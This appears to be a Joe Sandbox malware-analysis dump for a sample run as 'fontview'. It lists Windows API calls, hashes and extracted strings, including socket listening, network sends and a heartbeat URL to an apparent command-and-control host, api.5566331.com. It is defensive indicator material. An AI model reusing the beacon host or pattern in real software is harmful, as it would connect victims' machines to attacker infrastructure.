                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CurrentThread$EnterErrorFreeHeapLastLeave$EventsMultipleWait_free_malloc
                                                      • String ID:
                                                      • API String ID: 1895213536-0
                                                      • Opcode ID: f7a06b46e9486587628fea5504a0f07a6cf29015283a740d158dcf7141585061
                                                      • Instruction ID: 0298792182ec29e5365059a5bbda46a15199a9bf932673d6ad35eb89bca77991
                                                      • Opcode Fuzzy Hash: f7a06b46e9486587628fea5504a0f07a6cf29015283a740d158dcf7141585061
                                                      • Instruction Fuzzy Hash: 094158B0700B629FD710DF25DC84B6ABBE5FF48394F904629E855C7684EB70E854CB91
                                                      APIs
                                                      • getaddrinfo.WS2_32(?,00000000,00000100,?), ref: 1002550F
                                                      • _free.LIBCMT ref: 10025524
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      • WSASetLastError.WS2_32(00000000), ref: 10025531
                                                      • _memmove.LIBCMT ref: 1002557D
                                                      • freeaddrinfo.WS2_32(?), ref: 1002558B
                                                      • htons.WS2_32(00000000), ref: 10025599
                                                      • WSASetLastError.WS2_32(00002AF9), ref: 100255BF
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$FreeHeap_free_memmovefreeaddrinfogetaddrinfohtons
                                                      • String ID:
                                                      • API String ID: 189201043-0
                                                      • Opcode ID: d6bbbcf04e4f16ab3fda43b12ef97accaf12b863bd2168bf969dce3037045137
                                                      • Instruction ID: 8b64a374cbdad8b26f637beff122fe858c6ba4784a9924af0ca1a5756791f1ba
                                                      • Opcode Fuzzy Hash: d6bbbcf04e4f16ab3fda43b12ef97accaf12b863bd2168bf969dce3037045137
                                                      • Instruction Fuzzy Hash: F141BF32A047119FC314CF54D885A6BF7F5EFC8251F80861EF84A8A261EB71D944CB82
                                                      APIs
                                                      • timeGetTime.WINMM(75922F30,?,?,?,?,?,?,?,?,?,?,10023517,B7A91B76), ref: 1002726C
                                                      • timeGetTime.WINMM(?,000004FF,00000004,?,?,?,?,?,?,?,?,?,?,10023517,B7A91B76), ref: 1002728C
                                                      • MsgWaitForMultipleObjectsEx.USER32(00000001,?,?,000004FF,00000004), ref: 100272BA
                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 100272D0
                                                      • TranslateMessage.USER32(?), ref: 100272E4
                                                      • DispatchMessageA.USER32(?), ref: 100272EA
                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 100272F8
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Message$PeekTimetime$DispatchMultipleObjectsTranslateWait
                                                      • String ID:
                                                      • API String ID: 443098685-0
                                                      • Opcode ID: b409c91f6c29e2725a2b8632b37c6bf6fcbb9f4073073e100586dfda6f79b800
                                                      • Instruction ID: 079f8dbcd54a8d9c3218eb8dc4e85431248a595f9298e6c6c7ee3261443cfdea
                                                      • Opcode Fuzzy Hash: b409c91f6c29e2725a2b8632b37c6bf6fcbb9f4073073e100586dfda6f79b800
                                                      • Instruction Fuzzy Hash: 81118F71A40219ABEB10DBA4DD86FDDB7B8EB08750F204165FA05E72D0E7B1EE448B61
                                                      APIs
                                                      Strings
                                                      • %08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X, xrefs: 100113EB
                                                      • create guid error, xrefs: 10011397
                                                      • guid: %s, xrefs: 100113FC
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateGuid__snprintf_fprintf
                                                      • String ID: %08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X$create guid error$guid: %s
                                                      • API String ID: 2959897907-549114592
                                                      • Opcode ID: e4f7c53d94ba508e5d9395a5c9d7c3c913bd453e5628e8381e76af27a88afb61
                                                      • Instruction ID: 34a024b1c78299da0623422e875facfe61a2b6fae81b3d97e7196060f838763d
                                                      • Opcode Fuzzy Hash: e4f7c53d94ba508e5d9395a5c9d7c3c913bd453e5628e8381e76af27a88afb61
                                                      • Instruction Fuzzy Hash: 89118CA6C041997EDB51D7E58C12EFFBBFC9B09602F044042FA94E9082E638E745DB70
                                                      APIs
                                                        • Part of subcall function 100032F8: _memmove.LIBCMT ref: 100033BD
                                                        • Part of subcall function 100032F8: _memmove.LIBCMT ref: 100033F4
                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,00000000,00000005,?,?), ref: 1002FA74
                                                      • PostThreadMessageW.USER32(?,00002B5F,?,?), ref: 1002FAC5
                                                      • InternetCloseHandle.WININET(00000000), ref: 1002FADD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove$CloseHandleInternetMessagePostSleepThread
                                                      • String ID: http:$https:
                                                      • API String ID: 1130311992-2714316481
                                                      • Opcode ID: e92d616c37334f230bc487a600fe1986539f6064d4e22bcb91fdb7cfa4225be8
                                                      • Instruction ID: 915af8a31af0a75dffe03e89711a24d46bdad9159a96e45aa538bd49b24774f9
                                                      • Opcode Fuzzy Hash: e92d616c37334f230bc487a600fe1986539f6064d4e22bcb91fdb7cfa4225be8
                                                      • Instruction Fuzzy Hash: 5C127E70508381DFE321CF24D884BABBBE1FF89384F54896DE599872A1DB71A845CB53
                                                      APIs
                                                      • HeapAlloc.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 1002427A
                                                      • _memmove.LIBCMT ref: 100242C5
                                                      • WSASend.WS2_32(?,00000018,00000001,?,00000000,00000000,00000000), ref: 100242F6
                                                      • WSAGetLastError.WS2_32 ref: 10024301
                                                      • InterlockedDecrement.KERNEL32(00000028), ref: 10024318
                                                      • HeapFree.KERNEL32(?,00000000,00000000,00000000), ref: 10024340
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocDecrementErrorFreeInterlockedLastSend_memmove
                                                      • String ID:
                                                      • API String ID: 1113664776-0
                                                      • Opcode ID: a462f4ac9f8657c021b9b04c58686a58ea80ed4bfa49ce19956673eda0e90089
                                                      • Instruction ID: 47d4c8ab42c6eea9bfe2ced7c1d785e30afba0d0751f843b89e14ba74dfb26aa
                                                      • Opcode Fuzzy Hash: a462f4ac9f8657c021b9b04c58686a58ea80ed4bfa49ce19956673eda0e90089
                                                      • Instruction Fuzzy Hash: F1418E71A0060AEFDB00CFA5D880A9AB7F9FF48314F41462AE915E7640DB70FE54CB90
                                                      APIs
                                                        • Part of subcall function 100251A0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 100251C5
                                                        • Part of subcall function 100251A0: SwitchToThread.KERNEL32(?,?,?,?,?,1002240E), ref: 100251E9
                                                        • Part of subcall function 100251A0: Sleep.KERNEL32(00000001,?,?,?,?,?,1002240E), ref: 100251FB
                                                      • SetLastError.KERNEL32(000010DD), ref: 100222CC
                                                        • Part of subcall function 10022490: socket.WS2_32(?,00000001,00000006), ref: 100224D7
                                                        • Part of subcall function 10022490: ioctlsocket.WS2_32(?,8004667E,?), ref: 10022520
                                                        • Part of subcall function 10022490: bind.WS2_32(?,00000002,0000001C), ref: 10022540
                                                        • Part of subcall function 10022490: SetLastError.KERNEL32(00000000), ref: 10022551
                                                        • Part of subcall function 10022490: listen.WS2_32(?,?), ref: 1002256F
                                                      • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?,?), ref: 10022255
                                                      • GetLastError.KERNEL32 ref: 10022262
                                                      • SetLastError.KERNEL32(00000000), ref: 1002226C
                                                      • GetLastError.KERNEL32(?,?), ref: 100222AD
                                                      • SetLastError.KERNEL32(00000000), ref: 100222B8
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$CompareCompletionCreateExchangeInterlockedPortSleepSwitchThreadbindioctlsocketlistensocket
                                                      • String ID:
                                                      • API String ID: 3008254831-0
                                                      • Opcode ID: 33d1e1a823e7593172266413c69a16bb33dc59e5c5bd4c6ecac0f9ba098da95f
                                                      • Instruction ID: 25731126ecceef237b5eadcf649c6642afb87f46824a2e3290a2af4592c0b696
                                                      • Opcode Fuzzy Hash: 33d1e1a823e7593172266413c69a16bb33dc59e5c5bd4c6ecac0f9ba098da95f
                                                      • Instruction Fuzzy Hash: DC31AD31604646FFE700DFA5D848BAABBE9FF84750F50422AE811C77C0DB76A814CB90
                                                      APIs
                                                        • Part of subcall function 10026BA0: GetCurrentThreadId.KERNEL32 ref: 10026BA4
                                                      • CloseHandle.KERNEL32(?,B7A91B76), ref: 1001F34F
                                                      • CloseHandle.KERNEL32(?,B7A91B76), ref: 1001F35C
                                                      • DeleteCriticalSection.KERNEL32(?,B7A91B76), ref: 1001F374
                                                      • _free.LIBCMT ref: 1001F393
                                                      • HeapDestroy.KERNEL32(?), ref: 1001F3C1
                                                      • _free.LIBCMT ref: 1001F3F0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle_free$CriticalCurrentDeleteDestroyHeapSectionThread
                                                      • String ID:
                                                      • API String ID: 4172272558-0
                                                      • Opcode ID: 74966feeee5e55662b9fe9985a96bced8da136f5a641b9baab4b2a3d6fddc39d
                                                      • Instruction ID: 109e83372a2a65c369b5238d9d2ce49368707bcd3d3f496a78113b41b42a28fc
                                                      • Opcode Fuzzy Hash: 74966feeee5e55662b9fe9985a96bced8da136f5a641b9baab4b2a3d6fddc39d
                                                      • Instruction Fuzzy Hash: E0318BB0600745DBDB10CF69C844B9BFBE8FF54304F00461DE4559B690DBB5E948CB90
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10015454
                                                      • __time64.LIBCMT ref: 1001547B
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • _rand.LIBCMT ref: 10015488
                                                      • _rand.LIBCMT ref: 100154A7
                                                      • _rand.LIBCMT ref: 100154BC
                                                      • _rand.LIBCMT ref: 100154C9
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _rand$Time$FileH_prologSystem__aulldiv__time64
                                                      • String ID:
                                                      • API String ID: 719677733-0
                                                      • Opcode ID: f7a5117bf611885dd31e75710868ee461aec261d2f3beb21815ee12701733f13
                                                      • Instruction ID: a88c9a8f57be324bb81784dc804cb620c9220be911630338d4b2a3c06f03dd55
                                                      • Opcode Fuzzy Hash: f7a5117bf611885dd31e75710868ee461aec261d2f3beb21815ee12701733f13
                                                      • Instruction Fuzzy Hash: 00114C7ED10520ABC311DBA48C41BDEB3A5EF85666F65451BF825EF141CA79BCC052A0
                                                      APIs
                                                      • CreateMutexA.KERNEL32(00000000,00000000,1000EF35,000001C8), ref: 100151AF
                                                      • GetLastError.KERNEL32 ref: 100151BB
                                                      • ReleaseMutex.KERNEL32(00000000), ref: 100151C9
                                                      • CloseHandle.KERNEL32(00000000), ref: 100151D0
                                                      • ReleaseMutex.KERNEL32(00000000), ref: 100151DA
                                                      • CloseHandle.KERNEL32(00000000), ref: 100151E1
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                      • String ID:
                                                      • API String ID: 299056699-0
                                                      • Opcode ID: f16090332a443110e37fb4a15934dc5cf799fb4b965f6a5998d9995d691f2e92
                                                      • Instruction ID: 800ce60f158ef0ea3815663d752b036469cae43976e0dcf2657369177bbbfcb0
                                                      • Opcode Fuzzy Hash: f16090332a443110e37fb4a15934dc5cf799fb4b965f6a5998d9995d691f2e92
                                                      • Instruction Fuzzy Hash: 06F0FE76401A29FFE7029FB5DC999DE3BACEB15242B048012F9068A111C731DA85CFA5
                                                      APIs
                                                      • Sleep.KERNEL32(000001F4,?,?,?), ref: 1002F457
                                                      • PostThreadMessageW.USER32(?,00002B5F,?,?), ref: 1002F496
                                                      • InternetCloseHandle.WININET(00000010), ref: 1002F4A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleInternetMessagePostSleepThread
                                                      • String ID: http:$https:
                                                      • API String ID: 3505073871-2714316481
                                                      • Opcode ID: dc6705592221c2859f8811f9389cf8a6e0681e09b3c681b12275105aae90a8da
                                                      • Instruction ID: 08bc87893911aea4971000add18b57d5099268f2de168e91a491ab19bf3e696c
                                                      • Opcode Fuzzy Hash: dc6705592221c2859f8811f9389cf8a6e0681e09b3c681b12275105aae90a8da
                                                      • Instruction Fuzzy Hash: D1B1AE705083808FE711DF68E884B2BBBE6EF85394F84493DF496872A1D7B1D949CB52
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100114DC
                                                      • __time64.LIBCMT ref: 100114FD
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                        • Part of subcall function 10012234: __EH_prolog.LIBCMT ref: 10012239
                                                        • Part of subcall function 10012234: _free.LIBCMT ref: 100122FF
                                                        • Part of subcall function 10012234: _free.LIBCMT ref: 10012311
                                                        • Part of subcall function 1001BE7E: __EH_prolog.LIBCMT ref: 1001BE83
                                                        • Part of subcall function 1001BE7E: _sprintf.LIBCMT ref: 1001BEF8
                                                        • Part of subcall function 10003925: _memmove.LIBCMT ref: 10003950
                                                        • Part of subcall function 100036AE: _memmove.LIBCMT ref: 10003704
                                                        • Part of subcall function 1001BF99: __EH_prolog.LIBCMT ref: 1001BF9E
                                                      • _sprintf.LIBCMT ref: 100116C9
                                                        • Part of subcall function 1000246E: __EH_prolog.LIBCMT ref: 10002473
                                                      Strings
                                                      • /index.php/inface/Heart/index?data=%s&member_id=%s&time=%d, xrefs: 100116C3
                                                      • api.5566331.com, xrefs: 100116F0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog$Time_free_memmove_sprintf$FileSystem__aulldiv__time64
                                                      • String ID: /index.php/inface/Heart/index?data=%s&member_id=%s&time=%d$api.5566331.com
                                                      • API String ID: 2351994653-2092688287
                                                      • Opcode ID: 95f3a4b827d29c6a5c07f07f173c87bea5ef40cab863c3ac0567fab4c1ba7807
                                                      • Instruction ID: 883e9699974774e929dbfcc03b4e97d480afeffec36dd8d9086cd3d6d81822b8
                                                      • Opcode Fuzzy Hash: 95f3a4b827d29c6a5c07f07f173c87bea5ef40cab863c3ac0567fab4c1ba7807
                                                      • Instruction Fuzzy Hash: EF816F75D00158EEDB25DBA4CC91BEDB7B8EF14340F5081AAE40A63146EF706B89CFA1
                                                      APIs
                                                        • Part of subcall function 10001E92: _memmove.LIBCMT ref: 10001EF7
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 100273D1
                                                      • GetCurrentThreadId.KERNEL32 ref: 1002756D
                                                      • CreateThread.KERNEL32(00000000,00000000,1002F0F0,?,00000000,00000000), ref: 10027597
                                                      • Sleep.KERNEL32(0000000A,?,?,?,?,B7A91B76,?,00000000,?), ref: 100275AE
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 100275BE
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageThread$CreateCurrentSleep_memmove
                                                      • String ID:
                                                      • API String ID: 3715655313-0
                                                      • Opcode ID: 39d5c62766e2bbc70ef6cdbd50fa4a5060fd233e8bf87d7b70c1b337f9c92bb8
                                                      • Instruction ID: 20035363636fbff4d5577a0cf27411d17544e9d07305abe0b436cc653ffae869
                                                      • Opcode Fuzzy Hash: 39d5c62766e2bbc70ef6cdbd50fa4a5060fd233e8bf87d7b70c1b337f9c92bb8
                                                      • Instruction Fuzzy Hash: 69C1AC31A002559FDB01DFA8CC55BAEBFB1FB05310FD44269E80A6B6D2CBB5AD41CB91
                                                      APIs
                                                        • Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
                                                        • Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC
                                                      • __invoke_watson.LIBCMT ref: 1004A58B
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
